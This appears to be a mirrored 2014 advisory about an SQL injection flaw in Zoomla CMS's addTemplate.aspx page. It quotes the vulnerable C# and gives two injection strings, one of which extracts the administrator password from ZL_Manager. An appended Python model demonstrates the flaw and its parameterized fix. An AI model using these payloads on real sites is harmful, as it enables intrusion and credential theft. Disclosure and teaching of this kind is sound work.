By wave cms (Zoomla CMS): unauthorized SQL injection in one location

2014-11-04T00:00:00
ID MYHACK58:62201455462
Type myhack58
Reporter Anonymous
Modified 2014-11-04T00:00:00

Description

http://demo.zoomla.cn/app/addTemplate.aspx is a back-end management page: application push, add template.

The page just does a JS redirect, can you believe it?

app/addTemplate.aspx

<%@ page language="C#" autoeventwireup="true" inherits="manage_APP_AddAPP, App_Web_cin4d2pk" enableEventValidation="false" viewStateEncryptionMode="Never" %>

The key code of manage_APP_AddAPP in App_Web_cin4d2pk:

if (base.Request.QueryString["ID"] != null)
{
    this.model.AppName = this.TextAppName.Text;
    this.bll.Update(this.model); // parameterized query...
}
else if ((this.TextAppName.Text.Trim() != null) && (this.TextAppName.Text.Trim() != ""))
{
    // Tracing a few layers into Sel shows it runs a parameterized query; the problem is how it is called here
    if (this.bll.Sel("AppName='" + this.TextAppName.Text.Trim() + "'", "").Rows.Count > 0)
    {
        this.LblMessage.Text = "<font color=red>this application name already exists, please re-enter!</font>";

So when the form is submitted with an empty ID parameter, AppName is injectable.

Proof of vulnerability:

Fill in AppName with:

'and @@version>0 and '1'='1

'and (select top 1 AdminPassword from ZL_Manager)>0 and '1'='1

Please test it yourself.
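
The calling problem noted in the code comment above, modeled as an added example (not code from this advisory or from the CMS): a helper that binds parameters correctly still yields injection when the caller concatenates input into its where fragment. It uses Python's sqlite3 with a constructed table; make_db, sel, exists_concat, exists_bound and classify are hypothetical names.

```python
import sqlite3

def make_db():
    """Constructed sample data: a stand-in table, not the CMS schema."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE app (id INTEGER PRIMARY KEY, AppName TEXT)")
    db.executemany("INSERT INTO app (AppName) VALUES (?)", [("shop",), ("forum",)])
    return db

def sel(db, where, params=()):
    """Models a Sel(where, ...) style helper: it binds params correctly, but
    the `where` fragment itself is treated as trusted SQL text."""
    return db.execute("SELECT id, AppName FROM app WHERE " + where, params).fetchall()

def exists_concat(db, name):
    """The calling pattern from the advisory: input concatenated into `where`."""
    return len(sel(db, "AppName='" + name.strip() + "'")) > 0

def exists_bound(db, name):
    """Corrected call: `where` is a constant, the input travels as a bound value."""
    return len(sel(db, "AppName=?", (name.strip(),))) > 0

def classify(db, name):
    """Run both variants; differing results mean the input was parsed as SQL."""
    try:
        concat = exists_concat(db, name)
    except sqlite3.Error as exc:  # a stray quote breaks the statement's syntax
        concat = "error: " + type(exc).__name__
    return {"concat": concat, "bound": exists_bound(db, name)}

if __name__ == "__main__":
    db = make_db()
    # Constructed inputs: two plain names, a name with an apostrophe, and the
    # quote-balancing shape (' and '1'='1) used in the proof above.
    for sample in ["shop", "no-such-app", "O'Brien", "shop' and '1'='1"]:
        print(repr(sample), classify(db, sample))
```

Any input for which the two variants disagree, or for which the concatenated variant raises a database error, was interpreted as SQL rather than as a name.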